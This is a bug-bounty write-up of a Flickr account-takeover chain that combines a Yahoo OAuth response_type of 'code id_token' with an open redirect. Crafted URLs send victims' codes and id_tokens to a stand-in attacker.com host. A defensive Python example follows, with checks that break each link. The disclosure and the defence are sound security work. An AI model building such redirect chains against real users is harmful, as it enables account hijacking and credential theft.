Exploiting OAuth Misconfiguration To Takeover Flickr Accounts

1. OAuth Login Flow

OAuth Endpoint:

https://api.login.yahoo.com/oauth2/request_auth?client_id=[client_ID]&redirect_uri=[URL]&response_type=code&scope=openid,sdpp-w&nonce=[my_nonce]&.scrumb=jeTYmScEVYq

When the user is not logged in, this endpoint redirects the user to the following address:

// redirect URL
https://www.flickr.com/signin/yahoo/oauth/?redir=https://www.flickr.com/?ytcheck=1&new_session=1

After the user logs in, the server returns a code and redirects the user to the following address:

https://www.flickr.com/signin/yahoo/oauth/?redir=https://www.flickr.com/?ytcheck=1&new_session=1&code={redacted}

This code is then exchanged with the server for an accessToken.

2. Exploit

Reading the documentation shows that, besides code, the OAuth endpoint also accepts id_token as a response_type:

https://api.login.yahoo.com/oauth2/request_auth?client_id=[client_ID]&redirect_uri=[URL]&response_type=code id_token&scope=openid,sdpp-w&nonce=[my_nonce]&.scrumb=jeTYmScEVYq

When the user visits the URL above, they are redirected to

https://www.flickr.com/signin/yahoo/oauth/?redir=https://www.flickr.com/?ytcheck=1&new_session=1#code={redacted}&id_token={redacted}

As you might know, the fragment part of the URL (everything after #) is preserved by the browser when it follows a redirect response from the server.

However, flickr only redirects the user when the code is valid, so we need a valid code. Obviously we can obtain a valid code using our own account.

Furthermore, this endpoint only redirects the user to https://www.flickr.com/*. We need to find another open redirect vulnerability on flickr.com and use it for a second redirect to attack.com, in order to obtain the accessToken.

Finally, the author found an open redirect vulnerability in the flickr Android app:

https://www.flickr.com/sharing_connect.gne?service_type_id=9&token=a&callback_url=https:///google.com/

2.1 Wrap-Up

Have the user visit the following URL:

https://api.login.yahoo.com/oauth2/request_auth?client_id=[client_id]&redirect_uri=https://www.flickr.com/signin/yahoo/oauth/?code={here-is-the-attacker’s-code}&redir=https://www.flickr.com/sharing_connect.gne?service_type_id=9&token=a&callback_url=https:///attacker.com/&response_type=code id_token&scope=openid,sdpp-w&nonce=bb1c92e088f38e9c323fe025d42c405f&.scrumb=jeTYmScEVYq

After the user logs in, they are redirected to

https://www.flickr.com/signin/yahoo/oauth/?code={here-is-the-attacker’s-code}&redir=https%3A%2F%2Fwww.flickr.com%2Fsharing_connect.gne%3Fservice_type_id%3D9%26token%3Da%26callback_url%3Dhttps%253A%252F%252F%252Fattacker.com%252F#code={victim’s-code}&id_token={victim’s-id_token}

Since {here-is-the-attacker's-code} is valid, the user is redirected to

https://www.flickr.com/sharing_connect.gne?service_type_id=9&token=a&callback_url=https:///attacker.com/#code={victim’s-code}&id_token={victim’s-id_token}

Because of the open redirect vulnerability at this endpoint, the user is redirected once more to

https:///attacker.com/#code={victim’s-code}&id_token={victim’s-id_token}
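The chain above needs three things to hold at once: a redirect_uri check that accepts any https://www.flickr.com/* prefix, a response_type of "code id_token" that puts credentials in the URL fragment, and a callback_url check that lets https:///attacker.com/ through. The following added example (written for this page, not code from the original write-up or from Yahoo/Flickr) shows the server-side checks that would break each link. The allowlists, the function names and the ATTACK_* sample values are assumptions constructed for the demo; the write-up does not say why the triple-slash form passed Flickr's check, and the parser-mismatch explanation in callback_url_ok is a common cause, not a confirmed one.

```python
# Added example (not from the original write-up or from Yahoo/Flickr):
# server-side checks that would break the chain above. Allowlists, function
# names and the ATTACK_* sample values are assumptions constructed for the demo.
from urllib.parse import urlsplit

# Exact redirect URIs registered for the client (assumed value).
REGISTERED_REDIRECT_URIS = {"https://www.flickr.com/signin/yahoo/oauth/"}

# Response types the client is allowed to request (assumed: authorization code only).
ALLOWED_RESPONSE_TYPES = {"code"}

# Hosts the sharing callback_url may point at (assumed).
CALLBACK_ALLOWED_HOSTS = {"www.flickr.com"}

# Constructed stand-ins for the attacker-controlled parameters in the write-up.
ATTACK_REDIRECT_URI = (
    "https://www.flickr.com/signin/yahoo/oauth/?code=ATTACKER_CODE"
    "&redir=https://www.flickr.com/sharing_connect.gne?service_type_id=9"
    "&token=a&callback_url=https:///attacker.com/"
)
ATTACK_RESPONSE_TYPE = "code id_token"
ATTACK_CALLBACK_URL = "https:///attacker.com/"


def naive_redirect_ok(redirect_uri: str) -> bool:
    """Prefix check of the kind the write-up implies ('only redirects to https://www.flickr.com/*')."""
    return redirect_uri.startswith("https://www.flickr.com/")


def strict_redirect_ok(redirect_uri: str) -> bool:
    """Exact match against the registered URIs (as the OAuth 2.0 Security BCP requires).

    Any extra query parameter (the attacker's code, the redir chain) makes the
    string differ, so it is rejected; the post-login destination belongs in
    `state` or a server-side session, not in redirect_uri.
    """
    return redirect_uri in REGISTERED_REDIRECT_URIS


def response_type_ok(response_type: str) -> bool:
    """response_type is space separated; every token must be allowed.

    Rejecting id_token/token keeps credentials out of the URL fragment, which is
    what let them survive the redirect chain.
    """
    tokens = response_type.split()
    return bool(tokens) and all(t in ALLOWED_RESPONSE_TYPES for t in tokens)


def callback_url_ok(callback_url: str) -> bool:
    """Accept only https URLs with a non-empty, exactly allow-listed host.

    urlsplit('https:///attacker.com/') yields an empty netloc and the path
    '/attacker.com/', while a browser follows it as https://attacker.com/.
    Requiring a non-empty host closes that parser mismatch; rejecting userinfo
    and explicit ports removes two more ways to smuggle in a different host.
    """
    parts = urlsplit(callback_url)
    if parts.scheme != "https" or not parts.netloc or "@" in parts.netloc:
        return False
    try:
        if parts.port is not None:
            return False
    except ValueError:  # malformed port
        return False
    return parts.hostname in CALLBACK_ALLOWED_HOSTS


def evaluate_chain() -> dict:
    """Run each check against the write-up's attacker-controlled values."""
    return {
        "naive_redirect_passes": naive_redirect_ok(ATTACK_REDIRECT_URI),
        "strict_redirect_passes": strict_redirect_ok(ATTACK_REDIRECT_URI),
        "response_type_passes": response_type_ok(ATTACK_RESPONSE_TYPE),
        "callback_url_passes": callback_url_ok(ATTACK_CALLBACK_URL),
    }


if __name__ == "__main__":
    for check, passed in evaluate_chain().items():
        print(f"{check}: {passed}")
```

Running the script shows the naive prefix check accepting the attacker's redirect_uri while the exact-match check, the response_type allowlist and the callback_url check each reject their part of the chain. Any one of the three stricter checks is enough to stop this particular exploit; exact redirect_uri matching is the one that also removes the incentive to hunt for further open redirects under the allowed prefix.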

Ref

Yahoo Bug Bounty: Exploiting OAuth Misconfiguration To Takeover Flickr Accounts – MISHRE
